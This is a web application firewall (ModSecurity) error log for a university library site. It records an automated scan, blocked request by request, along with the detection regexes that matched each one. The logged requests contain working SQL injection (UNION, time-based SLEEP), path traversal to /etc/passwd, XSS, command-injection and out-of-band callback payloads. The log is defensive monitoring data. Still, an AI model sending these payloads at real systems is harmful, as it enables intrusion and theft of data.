[Tue Aug 29 11:40:33.419390 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAXbcMoAAAAL"]
[Tue Aug 29 11:40:36.357128 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAYMWRIAAAAR"]
[Tue Aug 29 11:40:37.428231 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAcbR-cAAAAv"]
[Tue Aug 29 11:40:39.378380 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcPiysAAAAa"]
[Tue Aug 29 11:40:40.400731 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAaHMe8AAAAE"]
[Tue Aug 29 11:40:44.602537 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAcYU4kAAAAp"]
[Tue Aug 29 11:40:44.640033 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAcVJQoAAAAB"]
[Tue Aug 29 11:40:46.460093 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAcYU5AAAAAp"]
[Tue Aug 29 11:40:50.365523 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAYMWSoAAAAR"]
[Tue Aug 29 11:40:50.412614 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAcYU5UAAAAp"]
[Tue Aug 29 11:40:53.575539 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbEUAAAAH"]
[Tue Aug 29 11:40:55.439486 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAcqJFUAAAAG"]
[Tue Aug 29 11:40:58.381951 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAYf-LAAAAAD"]
[Tue Aug 29 11:40:58.423721 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAYf-LIAAAAD"]
[Tue Aug 29 11:40:58.479242 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAYf-LQAAAAD"]
[Tue Aug 29 11:40:59.377371 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g3n9dmbtpu75eg.oast.site found within TX:1: cjmnbitjmimt14dgn26g3n9dmbtpu75eg.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcYU7AAAAAp"]
[Tue Aug 29 11:40:59.435896 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAcbSBkAAAAv"]
[Tue Aug 29 11:41:00.380239 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAYMWTcAAAAR"]
[Tue Aug 29 11:41:00.431792 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAActbFsAAAAH"]
[Tue Aug 29 11:41:00.439974 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAcsLC4AAAAE"]
[Tue Aug 29 11:41:01.475690 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAcvBdAAAAAJ"]
[Tue Aug 29 11:41:01.574876 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAYf-MEAAAAD"]
[Tue Aug 29 11:41:01.641363 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAYMWUAAAAAR"]
[Tue Aug 29 11:41:03.585126 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAYf-MkAAAAD"]
[Tue Aug 29 11:41:03.644284 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAcsLEAAAAAE"]
[Tue Aug 29 11:41:04.424522 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "perpustakaan.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAcqJHgAAAAG"]
[Tue Aug 29 11:41:04.447356 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAAcvBeYAAAAJ"]
[Tue Aug 29 11:41:05.404924 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcqJH4AAAAG"]
[Tue Aug 29 11:41:05.429108 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "perpustakaan.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAActbHYAAAAH"]
